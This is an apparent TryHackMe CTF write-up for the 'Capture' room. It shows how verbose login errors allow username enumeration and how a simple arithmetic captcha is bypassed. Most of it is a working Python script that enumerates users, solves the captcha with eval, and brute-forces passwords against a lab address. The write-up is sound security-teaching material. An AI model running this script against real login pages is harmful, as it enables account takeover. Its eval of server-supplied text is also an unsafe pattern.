TryHackMe - Capture

Poster

Can you bypass the login form?

Title	Capture
Description	Can you bypass the login form?
Points	30
Difficulty	Easy
Maker	toxicat0r

Summary

Poster: in this machine we use are given a list of usernames and passwords, we notice the errors on the login page are quite verbose, which would allow for user enumeration, thus we get valid users, which we use then to bruteforce the passwords, but there is a check against the enumeration which should be bypassed.

Description

SecureSolaCoders has once again developed a web application. They were tired of hackers enumerating and exploiting their previous login form. They thought a Web Application Firewall (WAF) was too overkill and unnecessary, so they developed their own rate limiter and modified the code slightly.

Solve

After trying a random user and password from the list we got, the error says : Invalid username, and after certain number of attemps we start getting capcha’s to solve, we automate the process using python :

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
import requests, re

url = "http://10.10.121.107/login"

with open("usernames.txt", "rt") as fd:
        usernames = fd.read().splitlines()

with open("passwords.txt", "rt") as fd:
        passwords = fd.read().splitlines()
regex = re.compile(r"(\d+\s[+*/-]\s\d+)\s\=\s\?")
def send_post(username, password, captcha=None):
        data = {
                "username":username,
                "password":password,
        }
        if captcha:
                data.update({"captcha":captcha})
        response = requests.post(url=url, data=data)
        return response
def solve_captcha(response):
    captcha = re.findall(regex, response.text)[0]
    return eval(captcha)
for count in range(100):
        response = send_post("darthvader", "lukesfather")
        try:
                captcha = solve_captcha(response)
                print(f"Captcha synchronised! Next solution is: {captcha}")
                break
        except:
                pass
for username in usernames:
        response = send_post(username, "None", captcha)
        captcha = solve_captcha(response)
        if not "does not exist" in response.text:
                for password in passwords:
                        response = send_post(username, password, captcha)
                        if not "Error" in response.text:
                                print(f"Success! Username:{username} Password:{password}")
                                exit(0)
                        else:
                                captcha = solve_captcha(response)

this shall get you the correct creds to login and grub the flag.